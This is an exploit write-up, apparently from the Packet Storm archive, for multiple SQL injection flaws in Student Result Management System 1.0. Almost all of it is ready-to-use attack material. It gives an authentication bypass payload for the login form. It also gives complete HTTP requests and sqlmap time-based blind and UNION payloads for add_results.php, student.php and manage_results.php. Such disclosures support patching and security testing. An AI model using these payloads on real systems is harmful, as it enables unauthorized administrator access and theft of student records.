Share
## https://sploitus.com/exploit?id=PACKETSTORM:159495
# Exploit Title: Student Result Management System 1.0 - Multiple SQL  
Injection Vulnerabilities  
# Date: 2020-10-02  
# Exploit Author: b1nary  
# Vendor Homepage:  
https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/  
# Software Link: https://github.com/projectworlds32/srms/archive/master.zip  
# Version: 1.0  
# Tested On: Linux + Apache2  
# Description: Project Worlds Student Result Management System 1.0 is  
subject to multiple SQL injection vulnerabilities due to improper input  
sanitization.  
  
  
=====================================================================================================  
  
Authentication bypass:  
  
POST /srms-master/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Firefox/68.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 37  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/srms-master/login.php  
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9  
Upgrade-Insecure-Requests: 1  
  
userid=admin' or 1=1 -- -&password=password  
  
=====================================================================================================  
  
POST parameters: rno, class_name  
  
POST /srms-master/add_results.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Firefox/68.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 43  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/srms-master/add_results.php  
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9  
Upgrade-Insecure-Requests: 1  
  
class_name=a*&rno=1*&p1=2&p2=3&p3=4&p4=5&p5=5  
  
  
Sqlmap PoC:  
  
Parameter: #2* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class_name=a&rno=1' AND (SELECT 8435 FROM  
(SELECT(SLEEP(5)))bqQO) AND 'ubgm'='ubgm&p1=2&p2=3&p3=4&p4=5&p5=5  
  
Parameter: #1* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class_name=a' AND (SELECT 9372 FROM (SELECT(SLEEP(5)))QJFS)  
AND 'ciTV'='ciTV&rno=1&p1=2&p2=3&p3=4&p4=5&p5=5  
  
=====================================================================================================  
  
GET parameter: class  
  
GET /srms-master/student.php?class=a*&rn=1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Firefox/68.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
DNT: 1  
Connection: close  
Referer: http://localhost/srms-master/login.php  
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9  
Upgrade-Insecure-Requests: 1  
  
  
Sqlmap PoC:  
  
Parameter: #1* (URI)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: http://localhost:80/srms-master/student.php?class=a' AND  
(SELECT 8178 FROM (SELECT(SLEEP(5)))eKNu) AND 'tPzY'='tPzY&rn=1  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 7 columns  
Payload: http://localhost:80/srms-master/student.php?class=a' UNION ALL  
SELECT  
NULL,CONCAT(0x71626b6b71,0x4c6d574642516a4d79436571774851464863774d676178767578515071537544534e784750445562,0x716b767871),NULL,NULL,NULL,NULL,NULL--  
-&rn=1  
  
=====================================================================================================  
  
POST parameters: class_name, rno  
  
POST /srms-master/manage_results.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Firefox/68.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 18  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/srms-master/manage_results.php  
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9  
Upgrade-Insecure-Requests: 1  
  
class_name=a*&rno=1*  
  
  
Sqlmap PoC:  
  
Parameter: #1* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class_name=a' AND (SELECT 6255 FROM (SELECT(SLEEP(5)))oVzX)  
AND 'paEb'='paEb&rno=1  
  
Parameter: #2* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class_name=a&rno=1' AND (SELECT 5940 FROM  
(SELECT(SLEEP(5)))orHi) AND 'wdBr'='wdBr  
  
=====================================================================================================  
  
POST parameters: class, rn  
  
POST /srms-master/manage_results.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101  
Firefox/68.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 37  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/srms-master/manage_results.php  
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9  
Upgrade-Insecure-Requests: 1  
  
class=a*&rn=1*&p1=1&p2=2&p3=3&p4=4&p5=5  
  
  
Sqlmap PoC:  
  
Parameter: #2* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class=a&rn=1' AND (SELECT 8305 FROM (SELECT(SLEEP(5)))Cldu)  
AND 'oMCW'='oMCW&p1=1&p2=2&p3=3&p4=4&p5=5  
  
Parameter: #1* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: class=a' AND (SELECT 3606 FROM (SELECT(SLEEP(5)))HOqE) AND  
'MgjX'='MgjX&rn=1&p1=1&p2=2&p3=3&p4=4&p5=5  
  
=====================================================================================================